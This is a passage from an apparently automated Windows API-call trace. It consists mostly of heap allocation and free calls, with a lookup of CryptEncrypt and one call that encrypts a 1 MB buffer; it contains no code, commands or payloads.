dwFlags=0x0, lpMem=0x433e020 | out: hHeap=0x970000) returned 1 [0167.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0167.958] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0167.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0167.959] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0167.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0167.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0167.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0167.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0167.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0167.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0167.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0167.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0167.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0167.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0167.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0167.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0167.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0167.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0167.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0167.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0167.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0167.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0167.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0167.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0167.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0167.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0167.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0167.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4224020 [0168.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0168.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4224020 | out: hHeap=0x970000) returned 1 [0168.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0168.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0168.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0168.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0168.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0168.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0168.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0168.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0168.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0168.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0168.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0168.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0168.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0168.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0168.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0168.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0168.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0168.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0168.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0168.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0168.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0168.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a88 [0168.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0168.144] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54508 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0168.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0168.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0168.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0168.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0168.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0168.145] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4110020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x4110020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0168.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0168.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0168.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0168.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0168.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0168.461] RtlAllocateHeap 